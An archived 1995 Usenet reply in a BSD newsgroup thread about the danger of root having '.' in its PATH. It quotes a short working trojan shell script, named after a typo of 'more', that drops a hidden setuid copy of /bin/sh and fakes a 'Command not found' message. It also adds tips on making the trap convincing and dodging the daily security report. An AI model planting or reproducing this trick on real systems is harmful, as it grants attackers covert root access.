*BSD News Article 48211


Return to BSD News archive

Newsgroups: comp.unix.bsd.misc
Path: sserve!euryale.cc.adfa.oz.au!newshost.anu.edu.au!harbinger.cc.monash.edu.au!simtel!swidir.switch.ch!scsing.switch.ch!news.belwue.de!fu-berlin.de!news.mathworks.com!newsfeed.internetmci.com!news.sprintlink.net!howland.reston.ans.net!swrinde!news.uh.edu!uuneo.neosoft.com!nmtigw!peter
From: peter@nmti.com (Peter da Silva)
Subject: Re: running as root with . in path Was: MacBSD ?
Message-ID: <id.2FCM1.KA2@nmti.com>
Sender: peter@nmti.com (peter da silva)
Organization: Network/development platform support, NMTI
References: <3vhdsc$a1q@rigel.pixi.com> <MARKG.95Aug8220219@kelly.teleport.com> <id.44CM1.5RD@nmti.com> <40am40$hqt@wolfe.wimsey.com>
Date: Wed, 9 Aug 1995 21:25:17 GMT
Lines: 25

In article <40am40$hqt@wolfe.wimsey.com>,
Curt Sampson <curt@cynic.portal.ca> wrote:
> In article <id.44CM1.5RD@nmti.com>, Peter da Silva <peter@nmti.com> wrote:
> >	#!/bin/sh
> >	cp /bin/sh /usr/share/man/.man_cache > /dev/null 2>&1 &&
> >	chmod 6711 /usr/share/man/.man_cache > /dev/null 2>&1 &&
> >	rm mroe &
> >	echo 'mroe: Command not found.'

> 	# more /etc/passwd
> 	mroe: Command not found.

You don't *call* the script "more", you call it "mroe".

Yes, there's lots of extra stuff you can do to make it mroe convincing.

> Also, note that the suid file change should show up in the daily
> security report.

Yeh, you have to keep an eye out and fix it before it gets caught.
-- 
Peter da Silva    (NIC: PJD2)                             `-_-'
Bailey Network Management                                  'U`
1601 Industrial Blvd.     Sugar Land, TX  77478  USA
+1 713 274 5180                                "Har du kramat din varg idag?"